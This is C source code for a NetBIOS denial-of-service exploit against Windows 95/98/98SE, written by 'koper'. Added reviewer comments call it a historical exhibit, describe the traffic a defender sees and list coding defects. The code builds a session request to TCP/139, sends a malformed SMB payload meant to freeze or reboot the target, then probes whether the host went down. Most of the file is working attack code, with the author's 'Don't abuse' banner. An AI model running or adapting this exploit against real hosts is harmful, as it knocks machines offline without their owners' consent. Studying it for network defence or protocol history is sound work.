/* Windows 95,98 and 98SE Denial Of Service. by koper
   Uses NetBIOS malformed packets to freeze/reboot remote machine.
   Don't abuse ... @least not 2much ;> */

/*
 * NOTE(review): Windows 9x era proof of concept, kept as an exhibit of what
 * the traffic looked like. On the wire a defender sees: a NetBIOS session
 * request (0x81) to TCP/139, the positive session response (0x82), then one
 * short SMB message whose command byte is 0xd0 (SMB_COM_SEND_SINGLE_BLOCK in
 * the MS-CIFS command table), followed by a second bare TCP connect used as a
 * liveness probe. The C defects noted below are left as found.
 */

/* NOTE(review): the header names were stripped by the page extraction (the
 * lines below are bare "#include"). The calls used need the stdio/stdlib/
 * string/unistd headers plus the BSD socket, netinet/in, arpa/inet and netdb
 * headers — restore them before building. */
#include
#include
#include
#include
#include
#include
#include
#include

#define PORT 139 //NetBIOS port ... goes without saying ;)

/* Pre-built NetBIOS session message (type 0x00, 16-bit length 0x0041 = 65)
 * carrying the SMB request (\xffSMB, command 0xd0) that the author describes
 * as malformed, followed by a text tag. main() writes only the first 72 bytes
 * of this array, so most of the trailing text never leaves the host. */
char kprcode[]=
"\x00\x00\x00\x41\xff\x53\x4d\x42\xd0\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x19\x00\x04\x42\x45\x41\x56\x00\x04\x42\x45\x41\x56\x49"
"\x53\x00\x01\x08\x00\x4f\x70\x65\x6e\x20\x59\x6f\x75\x72\x20"
"\x6d\x69\x6e\x64\x2e\x2e\x2e\x20\x61\x6e\x64\x20\x49\x20\x77\x69"
"\x6c\x6c\x20\x62\x65\x20\x74\x68\x65\x72\x65\x2e\x20\x6b\x70\x72\x0a";

/* NetBIOS session request (RFC 1002), laid out so that writing 72 bytes
 * sends the whole packet: every member is a char array, so there is no
 * padding and sizeof(struct samba_req) == 5 + 32 + 2 + 32 + 1 == 72.
 *   first    - 0x81 (SESSION REQUEST), flags 0x00, 16-bit length 0x0044 = 68
 *              (everything after the 4-byte header), then 0x20 = length of
 *              the first-level encoded called name
 *   yourname - 32-char encoded called name (the target's NetBIOS name)
 *   sep      - 0x00 terminates the called name, 0x20 starts the calling name
 *   myname   - 32-char encoded calling name
 *   end      - 0x00 terminates the calling name
 * The values are filled in by main(); the fields are deliberately not
 * NUL-terminated strings. */
struct samba_req {
    char first[5];
    char yourname[32];
    char sep[2];
    char myname[32];
    char end[1];
};

/* First-level encode name1 into name2 (32 chars + NUL); see definition. */
void name(char *name1, char *name2);
/* Resolve a dotted quad or hostname to an IPv4 address (network byte order). */
unsigned long int dns (char *host);

/*
 * Entry point.
 *   argv[1] - target host, dotted quad or hostname
 *   argv[2] - the target's NetBIOS name (author requires uppercase; nothing
 *             validates it). The usage string lost its argument placeholders
 *             in extraction — "%s \n" is what the page shows.
 * Flow: encode both NetBIOS names, resolve the host, connect to TCP/139,
 * send a session request, require a positive session response (0x82),
 * write the first 72 bytes of kprcode, then attempt a second TCP connect
 * and report "down" if it fails.
 * Exit status: 1 on usage, connect or no-response errors; dns() exits with 0
 * when resolution fails; otherwise 0 regardless of the probe's outcome.
 */
int main(int argc, char *argv[]){
    char buf[4000], buf2[4000], myname[33], yourname[33];   /* 32 encoded chars + NUL */
    struct sockaddr_in piggie;
    int soc, soc2, connex, x, x2;   /* connex and x2 are assigned but never read */
    struct samba_req smbreq;
    long temp;                      /* assigned once, never read */

    printf("\n******************************************************\n");
    printf("* Windows 95 && 98 Denial Of Service NetBIOS exploit *\n");
    printf("* \t by koper *\n");
    printf("******************************************************\n");
    printf(" Version: 0.5 - Support for Windows 98 SE\n\n");

    if (argc < 3) {
        printf("Usage: %s \n", argv[0]);
        printf("NetBIOS name must be in uppercase!\n");
        exit(1);
    }

    /* Calling name "KPR", space-padded by name(); the last encoded byte
     * (the NetBIOS suffix, chars 30-31) is overwritten with "AD", which
     * decodes to 0x03 — the messenger/user-name suffix. */
    name("KPR",myname); myname[30]='A'; myname[31]='D';
    /* Called name from the command line with the same 0x03 suffix. name()
     * uses at most the first 16 bytes of argv[2]. */
    name(argv[2],yourname); yourname[30]='A'; yourname[31]='D';

    printf("[+] Trying %s as NetBIOS name %s...\n",argv[1],argv[2]);
    printf("[+] Resolving...\n");
    temp = dns(argv[1]);                    /* resolved twice; temp is unused */
    piggie.sin_addr.s_addr = dns(argv[1]);  /* network byte order, truncated to in_addr_t */
    piggie.sin_family = AF_INET;
    piggie.sin_port = htons(PORT);
    printf("[+] %s resolved: OK...\n", argv[1]);

    /* socket() return value is unchecked; a -1 here only surfaces as the
     * connect() failure below (EBADF). */
    soc = socket(AF_INET,SOCK_STREAM,0);
    if((connex = connect(soc,(struct sockaddr *)&piggie,sizeof(piggie)))<0){
        perror("[+] Error");
        exit(1);
    }

    memset(buf,0,4000); memset(buf2,0,4000);

    /* Session request header: 0x81, flags 0, length 0x0044 = 68, then the
     * 0x20 label length that opens the called name. */
    memcpy(smbreq.first,"\x81\x00\x00\x44\x20",5);
    memcpy(smbreq.sep,"\x00\x20",2);    /* end of called name, start of calling name */
    memcpy(smbreq.end,"\x00",1);        /* end of calling name */
    /* strncpy with n == 32 copies exactly the 32 encoded characters and no
     * NUL; that is intended here — the terminators live in sep/end. */
    strncpy(smbreq.myname,myname,32);
    strncpy(smbreq.yourname,yourname,32);

    write(soc,&smbreq,72);                  /* 72 == sizeof smbreq; short writes unchecked */
    x=read(soc,buf,4000);                   /* x == 0: peer closed; x < 0: error */
    if(x<1){
        printf("[+] Oh my god! There's no responce !?!\n[+] Panic!\n");
        exit(1);
    }
    /* 0x82 is POSITIVE SESSION RESPONSE (RFC 1002); anything else — e.g. a
     * negative response because the called name is not registered — aborts. */
    if(buf[0]=='\x82') {
        printf("[+] Got responce from remote host...\n");
        printf("[+] Initialising attack...\n");
    }
    else {
        printf("[+] No responce from remote machine (check NBname)...\n[+] Panic!\n");
        exit(1);
    }

    /* &kprcode has the same address as kprcode; only the first 72 bytes of
     * the array are sent. */
    write(soc,&kprcode,72);
    x=read(soc,buf,4000);                   /* any reply is read and discarded */
    close(soc);
    printf("[+] Packet SENT!\n");
    printf("[+] Checking hostname...\n");

    /* NOTE(review): soc was closed two lines above, so this write()/read()
     * pair fails with EBADF and x2 is never examined. The "down" verdict
     * below rests entirely on the second connect(). */
    write(soc,&smbreq,72);
    x2=read(soc,buf2,4000);

    /* Liveness probe: any connect() failure (refused, timeout, transient
     * error) is reported as "host down". soc2 is never closed; the process
     * exits right after. */
    soc2=socket(AF_INET,SOCK_STREAM,0);
    if(connect(soc2,(struct sockaddr *)&piggie,sizeof(piggie))<0)
        printf("[+] Host is down... YEAH!\n\n");
    else
        printf("[+] %s is still up, probably not vulnerable...\n\n",argv[1]);
}

/*
 * NetBIOS first-level name encoding (RFC 1001/1002): each byte of name1 is
 * split into two nibbles and each nibble is emitted as 'A' + nibble, so 16
 * input bytes become 32 output characters. Input shorter than 16 bytes is
 * padded with "CA" (= 0x20, a space); input longer than 16 bytes is silently
 * truncated. name2 must have room for 33 bytes (32 characters + NUL).
 *   name1 - NUL-terminated source name (must not be NULL: strlen is called)
 *   name2 - destination, 33 bytes, always NUL-terminated on return
 * Caveat: c is a plain char, so where char is signed, bytes >= 0x80 make
 * (int)c negative and produce characters below 'A' — only 7-bit input
 * encodes correctly.
 */
void name(char *name1, char *name2) {
    char c, c1, c2;
    int i, len;
    len = strlen(name1);                    /* size_t narrowed to int; only i < 16 matters */
    for (i = 0; i < 16; i++) {
        if (i >= len) {
            c1 = 'C'; c2 = 'A';             /* "CA" encodes 0x20: space padding */
        } else {
            c = name1[i];
            c1 = (char)((int)c/16 + (int)'A');   /* high nibble */
            c2 = (char)((int)c%16 + (int)'A');   /* low nibble */
        }
        name2[i*2] = c1;
        name2[i*2+1] = c2;
    }
    name2[32] = 0;
}

/*
 * Resolve host (dotted quad or hostname) to an IPv4 address in network byte
 * order. On resolution failure prints a message and exit(0)s — note that the
 * status 0 reports success to the caller's shell.
 *
 * NOTE(review): defects left as found —
 *  - inet_addr() returns in_addr_t (unsigned 32-bit). Stored in a long and
 *    compared with -1, the INADDR_NONE test only works where long is 32 bits;
 *    on LP64 the branch is never taken and a non-numeric host is returned as
 *    0xffffffff instead of being looked up.
 *  - *(unsigned long *) he->h_addr reads sizeof(unsigned long) bytes from a
 *    4-byte AF_INET address: an over-read on LP64 and an aliasing violation.
 *    memcpy() into an in_addr_t is the correct form.
 *  - the trailing return(i) is inside the if block after two branches that
 *    both leave the function, so the dotted-quad path (inet_addr succeeded)
 *    falls off the end of a non-void function — undefined behaviour.
 *  - gethostbyname() is obsolete; getaddrinfo() is the modern replacement.
 */
unsigned long int dns (char *host) {
    long i;
    struct hostent *he;
    i = inet_addr(host);
    if (i==-1){
        he=gethostbyname(host);
        if(he==NULL){
            printf("[+] Unable to resolve %s...\n[+] Panic!\n", host);
            exit(0);
        }
        else{return(*(unsigned long *) he->h_addr); }
        return(i);                          /* unreachable: both branches above leave */
    }
}                                           /* no return on the i != -1 path */